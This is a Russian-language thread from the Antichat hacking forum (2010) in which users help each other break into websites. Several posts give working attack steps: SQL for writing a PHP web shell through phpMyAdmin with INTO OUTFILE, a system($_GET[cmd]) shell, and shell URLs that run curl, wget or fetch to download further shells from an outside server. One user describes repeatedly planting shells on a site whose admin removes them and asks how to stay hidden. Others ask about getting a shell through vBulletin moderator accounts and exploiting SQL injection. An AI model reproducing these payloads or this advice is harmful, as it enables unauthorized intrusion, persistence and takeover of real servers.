ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12231  
Старый 28.03.2010, 22:55
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

а у меня такой вопрос как залить шелл через phpmyadmin желательно подробно...
 
Ответить с цитированием

  #12232  
Старый 28.03.2010, 23:26
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от 547  
а у меня такой вопрос как залить шелл через phpmyadmin желательно подробно...
Cоздаем таблицу, например 'hack' с колонкой 'shell'
CREATE TABLE 'hack' ('shell' TEXT);
Записываем в базу скрипт который должен инклудить шелл с сервера
INSERT INTO 'hack' ('shell') VALUES ('<? include 'http://сервер с шеллом' ?>');
Ищем папку с правами на запись uploads,images,etc.
Подставляем путь в запрос: SELECT shell FROM 'hack' INTO OUTFILE '/home/сайт/www/uploads/shell.php';

Последний раз редактировалось Redwood; 29.03.2010 в 04:00..
 
Ответить с цитированием

  #12233  
Старый 29.03.2010, 00:00
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

SELECT '<? system($_GET[cmd]); ?>' from mysql.user into outfile '/var/www/html/site/tmp/shel.php';

www.site.com/shel.php?cmd=ls
shel.php?cmd=curl --output /papka/na/servere/shell.php http://www.site.ru/shell.txt
shel.php?cmd=wget -o /papka/na/servere/shell.php http://www.site/shell.txt
shel.php?cmd=get http://www.site.ru/shell.txt > /papka/na/servere/shell.php
shel.php?cmd=fetch -o /papka/na/servere/shell.php http://www.site.ru/shell.txt

путь нужен полюбом
 
Ответить с цитированием

  #12234  
Старый 29.03.2010, 00:38
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от Gorev  
SELECT '<? system($_GET[cmd]); ?>' from mysql.user into outfile '/var/www/html/site/tmp/shel.php';

www.site.com/shel.php?cmd=ls
shel.php?cmd=curl --output /papka/na/servere/shell.php http://www.site.ru/shell.txt
shel.php?cmd=wget -o /papka/na/servere/shell.php http://www.site/shell.txt
shel.php?cmd=get http://www.site.ru/shell.txt > /papka/na/servere/shell.php
shel.php?cmd=fetch -o /papka/na/servere/shell.php http://www.site.ru/shell.txt

путь нужен полюбом
ну да, но меня интересовало как залить шелл именно через phpmyadmin.
спсасибо но я уже разобрался просто ты похоже описал как залить шелл через сиквел инжекцию...

кстати единственное с чем возникла трудность при заливке так это синтаксис
select * from 'table' into outfile 'путь' -не правильно
select * from `table` into outfile 'путь' -так правильно
а весь прикол в кавычках оказалсо

ппц. я в шоке ну и админ попался 4 раз шелл лью а он его удаляет!!! при всем том что код обфусцирован... и сам файл я вроде переименовывал,прятал...
как можно по другому остатся в системе?

Последний раз редактировалось 547; 29.03.2010 в 02:05..
 
Ответить с цитированием

  #12235  
Старый 29.03.2010, 04:47
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от 547  
ппц. я в шоке ну и админ попался 4 раз шелл лью а он его удаляет!!! при всем том что код обфусцирован... и сам файл я вроде переименовывал,прятал...как можно по другому остатся в системе?
Возможно на сервере кроном гоняеться скрипт, который дропает файлы по дате создания и весу.
 
Ответить с цитированием

  #12236  
Старый 29.03.2010, 06:23
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Цитата:
Сообщение от Serafim  
Есть права модера и vbulletin 4.0.2 , пробовал все способы со старых версий- не работают.
Жду предложений по этому поводу.
O_o а по человечески можешь объяснить?
 
Ответить с цитированием

  #12237  
Старый 29.03.2010, 08:29
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

547 ты не прав, я описал именно как залить шелл через пхпмайадмин, обращатся все равно через БД, поэтому и синтаксис одинаковый, я не раз заливал через пхпадмина именно так, конечно нужен юзер рут и папка с правами на запись и соответсвенно сам путь до папки.

а по поводу как спрятать шелл от злобного админа есть способ который описал Dimi4 ..вот собственно и link
смотри в самом низу статьи
 
Ответить с цитированием

  #12238  
Старый 29.03.2010, 10:51
Serafim
Участник форума
Регистрация: 24.10.2006
Сообщений: 261
Провел на форуме:
3227914

Репутация: 174
По умолчанию

Цитата:
Сообщение от [Feldmarschall]  
O_o а по человечески можешь объяснить?
Что еще объяснять? Есть аккаунты модератора на двух форумах- vbulletin 4.0.2 и vbulletin 3.8.5. Нужно залить шелл. Старые баги с заливкой через предупреждения и репутацию- не работают.
 
Ответить с цитированием

  #12239  
Старый 29.03.2010, 14:34
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

как раскручивать скули, если значение не int ?
например,
view_all.php?part=analit'

ошибка :

Цитата:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/admin/www/view_all.php on line 44

Warning: Division by zero in /usr/home/admin/www/view_all.php on line 250

Warning: Division by zero in /usr/home/admin/www/view_all.php on line 251
 
Ответить с цитированием

  #12240  
Старый 29.03.2010, 15:28
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
Отправить сообщение для Jerri с помощью ICQ
По умолчанию

Цитата:
Сообщение от jecka3000  
как раскручивать скули, если значение не int ?
например,
view_all.php?part=analit'
Так же как и всегда.

Последний раз редактировалось Jerri; 29.03.2010 в 15:31..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ